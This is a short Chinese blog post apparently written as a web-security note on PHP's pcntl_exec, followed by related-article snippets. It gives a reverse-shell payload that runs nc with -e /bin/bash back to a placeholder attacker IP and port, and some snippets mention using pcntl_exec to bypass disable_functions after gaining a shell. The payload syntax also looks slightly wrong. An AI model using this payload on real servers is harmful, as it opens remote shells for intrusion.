pcntl_exec函数

于 2024-07-24 22:15:56 发布
阅读量30 收藏
点赞数
文章标签: linux php 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Lhy1963245411/article/details/140674177
版权

函数介绍:

bool pcntl_exec(string $path, array $args = [], array $envs = []);

 path:我们执行一个shell命令,比如ls,这个命令肯定是从linux系统的某个文件中获取的,这里的path就是文件的位置

args:就是我们需要传给程序的参数的字符串数组

envs:环境变量,通常使用默认即可

使用限制:此函数未被禁用,可通过phpinfo查看

由于函数本身没有回显,所以需要通过shell反弹来查看

举例:我们需要执行ls命令,那么payload=pcntl_exec("/bin/bash","nc xxx.xxx.xxx.xxx yyyy -e /bin/bash");

其中xxx.xxx.xxx.xxx是ip地址,

payload=pcntl_exec("/bin/bash",array("nc xxx.xxx.xxx.xxx yyyy -e /bin/bash"));
#其中xxx.xxx.xxx.xxx是ip地址,yyyy是攻击机开放的端口
#nc反弹到监听端口
#-e /bin/bash 返回命令行交互界面

feiwuw
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP多进程 - 在一个进程空间运行另外一个程序,pcntl_exec与exec的区别,supervisor原理
猛犸象
08-18 1086
概述 fork 和 exec 是unix平台下多进程操作的重要方法,fork 我们已经很熟悉了,今天来简单聊聊exec。 exec 函数可以在一个进程空间运行另外一个程序。 在Linux中要使用exec函数族。系统调用execve()对当前进程进行替换,替换者为一个指定的程序,其参数包括文件名(filename)、参数列表(argv)以及环境变量(envp)。 exec函数族当然不止一个,但它们大致相同,在 Linux中,它们分别是:execl,execlp,execle,execv,execve和exec
php pcntl exec,php渗透测试技巧-文件操作与利用pcntl_exec突破disable_functions
weixin_39611070的博客
03-17 245
有些时候通过文件包含漏洞或其他漏洞拿到一个临时shell之后却发现服务器对disable_functions做了比较变态的设置。使得我们没法将shell或local exp写到其他目录。如:#print_r(ini_get('disable_functions'));putenv,chdir,dl,shell_exec,exec,system,passthru,popen,fopen,fputs,...
php渗透测试技巧-文件操作与利用pcntl_exec突破disable_functions
weixin_45682070的博客
08-09 1180
有些时候通过文件包含漏洞或其他漏洞拿到一个临时shell之后却发现服务器对disable_functions做了比较变态的设置。使得我们没法将shell或local exp写到其他目录。 #print_r(ini_get('disable_functions')); putenv,chdir,dl,shell_exec,exec,system,passthru,popen,fopen, fputs,mkdir,rmdir,rename,move_uploaded_file,unlink,copy,chgrp
PHP多进程 - 回收子进程pcntl_wait 与 pcntl_waitpid
猛犸象
06-07 2768
前面已经讲到,当父进程是一个常驻进程的时候,子进程退出了,父进程没有回收它,那么该子进程会成为僵尸进程,且必须等到父进程退出了才会被销毁。所以,如果父进程只是个短暂的进程,那么也没必要去回收子进程,当然主动回收更好。 PHP中父进程回收子进程的函数有两个 1、pcntl_waitpid pcntl_waitpid ( int $pid , int &$status [, int $options = 0 ] ) : int 2、pcntl_wait pcntl_wait ( int &$
php pcntl_fork和pcntl_fork 的用法
12-18
- Python 的 `os.fork()` 和 `exec()`:与 PHP 的 `pcntl_fork()` 类似,用于创建子进程并执行新的程序。 - Linux 的 `fork()` 函数:是 C 语言中的原生接口,与 PHP 的 `pcntl_fork()` 相对应。 7. **总结**: ...
PHP使用pcntl_fork实现多进程下载图片的方法
12-18
`pcntl_exec()`函数允许在当前进程空间执行指定的程序,它接受程序路径和参数作为参数,用于替换当前进程执行的内容。 下面是一个使用`pcntl_fork()`下载多张图片的例子。代码首先从网页中抓取所有图片链接,然后...
PHP 使用pcntl和libevent 实现Timer功能
10-26
`pcntl_alarm()`函数可以设置一个定时器,在指定的秒数后向进程发送一个SIGALRM信号,而`pcntl_exec()`函数则可以替换当前进程的执行上下文,运行指定的程序。 `pcntl_fork()`是`pcntl`扩展的核心函数,它创建的子...
以实例全面讲解PHP中多进程编程的相关函数的使用
12-17
在PHP中进行多进程编程,主要是借助于PCNTL(Process Control...通过合理使用PCNTL函数,可以实现更高效的任务调度和并发处理。然而,需要注意的是,多进程编程会增加资源消耗,因此在实际应用中需权衡性能和资源使用。
Linux小程序——进度条
最新发布
m0_66182473的博客
07-23 685
进度条
Linux:基础命令学习
qq_55038440的博客
07-20 917
实例:-F根据文件类型在列出的文件名称后加一符号。实例: -R 递归显示目录中的所有文件和子目录。. 开头的隐藏文件也会列出。可执行文件则加 "*",用于显示目录文件信息。
linux学习笔记整理: 关于linux:Shell脚本 2024/7/20;
gzx233的博客
07-20 893
Shell脚本的使用
【Linux服务器Java环境搭建】010在linux中安装Redis,以及对Redis的配置与远程连接
liuzhenhe1988的专栏
07-19 1026
好久没有更新博客了,今天下了班回到家,看到电脑桌上尘封已久的《Spring Boot应用开发实战》,翻开目录想起来之前写的系列【Linux服务器Java环境搭建】还未完结,那就继续吧,今天主要是按linux服务器中安装和配置redis。本系列其他文章,请查看系列【Linux服务器Java环境搭建】
Linux 权限
includemainprinf的博客
07-18 692
在Linux操作系统中,权限管理是一个至关重要的概念,它确保了系统的安全性和稳定性。同时可以在工作中,设置对象的权限,就算我们很多人使用一台服务器,我们也可以让别人看不到我们文件的内容,或者让别人无法对自己的文件进行操作!
Linux(CentOS7)部署PHP-7.2.17源码包
thetender的博客
07-18 1172
LAMP系统安装 通过PHP的源码包部署PHP-7.2.17版本
Linux HOOK机制与Netfilter HOOK
Flashing-C的博客
07-18 788
在计算机中基本所有的软件程序都可以通过hook方式进行行为拦截,hook方式就是改变原始的执行流。 Linux常见的HOOK方式:1、修改函数指针。2、用户态动态库拦截。①利用环境变量LD_PRELOAD和预装载机制进行HOOK;②利用函数ptrace可实现对已运行的程序进行HOOK;3、内核态系统调用拦截。通过修改全局系统调用表,对系统调用进行劫持;4、堆栈式文件系统拦截。5、LSM。6、Netfilter HOOK。
Linux RV1126开发板 + AIR780E模块配置RNDIS网络
wxj280306451的博客
07-18 1045
此时,使用lsusb命令可以看到 AIR780E在开发板上枚举出来的PID和VID1d91 和 0001 就是VID和PID。
Linux——多路复用之select
kkbca的博客
07-19 1174
在前面,我们学习了五种IO模型,对IO有了基本的认识,知道了select效率很高,可以等待多个文件描述符,那他是如何等待的呢?我们又该如何使用呢?
【Linux】文件创建与写入系统调用流程摸索
07-19 351
第五行是搜索我们操作的文件名,看看在操作系统层面对文件的操作,内核里边源代码对应函数的打印的流程是否正确,因为有些函数同名函数很多,不一定是我们找到的,而且代码中函数里还有各种分支,判断等等,所以也有点点难度。第一行是打开日志输出(其实操作系统运行时日志是输出到/var/log/kern.log和/var/log/syslog里了,这也即是为什么我们老是去syslog文件搜索我们在内核源代码的打印信息);第二行是把字符串写入到一个文件,这个文件原来是没有的,其实就是创建文件,写入文件;
pcntl_exec
09-22
pcntl_exec是一个PHP函数,用于在当前进程空间执行指定程序。它的作用是替换当前进程的代码和数据,用指定的程序来执行。pcntl_exec函数的第一个参数必须是可执行的二进制文件路径,或者是在文件第一行指定了可执行文件路径标头的脚本。第二个参数是命令行参数,第三个参数是环境参数。pcntl_exec函数的内部系统调用是execve。下面是一个示例代码: pcntl_exec("/usr/bin/php", ['demo.php', 'arg1', 'arg2'], ['ENV_VAR1=value1', 'ENV_VAR2=value2']); 在这个示例中,pcntl_exec函数将替换当前进程的代码和数据,用"/usr/bin/php"程序来执行,并将命令行参数设置为['demo.php', 'arg1', 'arg2'],环境参数设置为['ENV_VAR1=value1', 'ENV_VAR2=value2']。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值